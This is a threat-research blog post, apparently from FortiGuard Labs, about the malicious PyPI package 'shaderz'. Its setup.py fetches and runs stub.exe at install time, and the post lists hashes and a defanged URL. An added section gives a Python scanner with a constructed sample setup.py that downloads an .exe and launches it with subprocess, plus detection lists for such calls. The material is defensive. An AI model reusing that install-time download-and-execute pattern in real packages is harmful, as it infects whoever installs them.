FortiGuard Labs Threat Research
Our Fortinet Advanced Research Team recently discovered a 0-day attack in a PyPI package (Python Package Index) called “shaderz”. It was discovered on December 6, 2022, through a system we use to monitor open-source ecosystems. This Python package was published on December 2, 2022, as shown in its official PyPI repository. Our suspicions were initially raised because it only has one published version, 0.0.1, and does not include a clear description of the package, the author’s email, or its source page.
The package includes malicious code in its setup.py installation script that downloads and runs an executable file as a part of its installation.
One particularly interesting element is the URL, which requires deeper analysis: https://cdn[.]discordapp[.]com/attachments/1045000289708687390/1045159487079723058/stub.exe.
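The install-time download-and-execute pattern described above is exactly what a static check of an sdist's setup.py can surface before the package is ever installed. The following scanner is an added example, not code from FortiGuard Labs; it parses setup.py with Python's `ast` module and flags network downloads, process execution, and literals such as `.exe` file names or the CDN host cited in this report. The embedded setup.py is a constructed sample that mimics the described behaviour; its URL is a placeholder, not the package's real content.

```python
import ast
import re

# Constructed sample setup.py that mimics the behaviour described above:
# fetch an .exe from a CDN during installation, then execute it. The URL is a
# placeholder, not the one from the real package.
SAMPLE_SETUP_PY = '''
from setuptools import setup
import urllib.request, subprocess
urllib.request.urlretrieve("https://cdn.example.invalid/attachments/1/2/stub.exe", "stub.exe")
subprocess.Popen(["stub.exe"])
setup(name="shaderz", version="0.0.1")
'''

# A build script only needs to declare metadata; downloading or executing
# anything at install time is a red flag.
DOWNLOAD_CALLS = {"urllib.request.urlretrieve", "urllib.request.urlopen", "requests.get"}
EXEC_CALLS = {"subprocess.Popen", "subprocess.run", "subprocess.call",
              "os.system", "os.startfile", "exec", "eval"}
# Literals worth flagging: Windows executables and the CDN host seen in this campaign.
SUSPICIOUS_LITERAL = re.compile(r"\.exe$|cdn\.discordapp\.com", re.IGNORECASE)


def _dotted_name(node: ast.AST) -> str:
    """Return 'a.b.c' for a Name/Attribute chain, or '' if it cannot be resolved."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def scan_setup_py(source: str) -> list[tuple[int, str]]:
    """Return (line, reason) findings for install-time download/execution patterns."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in DOWNLOAD_CALLS:
                findings.append((node.lineno, f"network download via {name}()"))
            elif name in EXEC_CALLS:
                findings.append((node.lineno, f"process execution via {name}()"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if SUSPICIOUS_LITERAL.search(node.value):
                findings.append((node.lineno, f"suspicious literal {node.value!r}"))
    return sorted(findings)
```

Running `scan_setup_py(SAMPLE_SETUP_PY)` reports the urlretrieve download and the Popen execution on lines 4 and 5 of the sample, plus each `.exe` literal; a metadata-only setup.py yields no findings. Aliased imports (`import subprocess as s`) would evade this name-based matcher, so treat it as a triage aid rather than a verdict.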
As shown in the VirusTotal entry for the download URL, the downloaded binary has the following SHA-256 hash: 33df1d9c50a9bd9d3e71dc61c0a7f41f7ca51612e9c3babcea927adde169e62d.
While this download URL has not previously been detected by any other threat researchers, some vendors do flag the downloaded executable file as malicious.
The downloaded executable appears to be a Python script compiled into an executable file. We will share more details of our analysis of this file in our next post.
We will continue to monitor and help organizations defend against malicious packages found in the wild like this one to help protect our customers against attacks from unknown sources. For more detail, read part 2 of this blog.
FortiGuard AntiVirus detects the malicious executable identified in this report as W32/PossibleThreat.
The FortiGuard AntiVirus service is supported by FortiGate, FortiMail, FortiClient, and FortiEDR. Customers running current AntiVirus updates are protected.
The FortiGuard Web Filtering Service detects as malicious and blocks the download URL cited in this report.
Files
shaderz-0.0.1[.]tar[.]gz (SHA-256): fd9f944fafb58faf783fdf4f8638d281a429b84cdb119756e6d7d92b31a079de
stub.exe (SHA-256): 33df1d9c50a9bd9d3e71dc61c0a7f41f7ca51612e9c3babcea927adde169e62d
Malicious URLs
cdn[.]discordapp[.]com/attachments/1045000289708687390/1045159487079723058/stub[.]exe